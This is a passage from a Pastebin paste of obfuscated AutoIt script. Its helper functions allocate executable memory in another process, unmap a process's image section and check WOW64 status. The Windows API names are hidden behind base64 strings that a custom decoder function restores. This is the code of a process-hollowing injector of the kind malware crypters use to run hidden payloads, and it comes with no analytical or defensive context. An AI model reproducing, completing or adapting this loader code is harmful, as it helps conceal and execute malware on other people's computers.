  180.         $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("cHRy"), octdsfveflrtqx("VmlydHVhbEFsbG9jRXg="), octdsfveflrtqx("aGFuZGxl"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), $enultomnaeouqu, octdsfveflrtqx("ZHdvcmRfcHRy"), $plvgudfjmrmfpc, octdsfveflrtqx("ZHdvcmQ="), 12288, octdsfveflrtqx("ZHdvcmQ="), 64)
  181.         If @error OR NOT $sxczganvblgaaq[0] Then Return SetError(1, 0, 0)
  182.     EndIf
  183.     Return $sxczganvblgaaq[0]
  184. EndFunc
  185.  
  186. Func htcllljaodnpmr_allocateexespace($dirxmpngrrplfj, $plvgudfjmrmfpc)
  187.     Local $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("cHRy"), octdsfveflrtqx("VmlydHVhbEFsbG9jRXg="), octdsfveflrtqx("aGFuZGxl"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), 0, octdsfveflrtqx("ZHdvcmRfcHRy"), $plvgudfjmrmfpc, octdsfveflrtqx("ZHdvcmQ="), 12288, octdsfveflrtqx("ZHdvcmQ="), 64)
  188.     If @error OR NOT $sxczganvblgaaq[0] Then Return SetError(1, 0, 0)
  189.     Return $sxczganvblgaaq[0]
  190. EndFunc
  191.  
  192. Func htcllljaodnpmr_unmapviewofsection($dirxmpngrrplfj, $enultomnaeouqu)
  193.     DllCall(octdsfveflrtqx("TlRETEw="), octdsfveflrtqx("aW50"), octdsfveflrtqx("TnRVbm1hcFZpZXdPZlNlY3Rpb24="), octdsfveflrtqx("cHRy"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), $enultomnaeouqu)
  194.     If @error Then Return SetError(1, 0, 0)
  195.     Return 1
  196. EndFunc
  197.  
  198. Func htcllljaodnpmr_iswow64process($dirxmpngrrplfj)
  199.     Local $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), "IsWow64Process", octdsfveflrtqx("aGFuZGxl"), $dirxmpngrrplfj, "bool*", 0)
  200.     If @error OR NOT $sxczganvblgaaq[0] Then Return SetError(1, 0, 0)
  201.     Return $sxczganvblgaaq[2]
  202. EndFunc
  203.  
  204. Func octdsfveflrtqx($s)
  205.     Local $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", $t = "", $p = -8, $a = 0, $c, $d, $len = StringLen($s)
  206.     For $i = 1 To $len
  207.         $c = StringInStr($key, StringMid($s, $i, 1), 1) - 1
  208.         If $c < 0 Then ContinueLoop
  209.         $a = BitOR(BitShift($a, -6), BitAND($c, 63))
  210.         $p = $p + 6
  211.         If $p >= 0 Then
  212.             $d = BitAND(BitShift($a, $p), 255)
  213.             If $c <> 64 Then $t = $t & Chr($d)
  214.             $a = BitAND($a, 63)
  215.             $p = $p - 8
  216.         EndIf
  217.     Next
  218.     Return $t
  219. EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!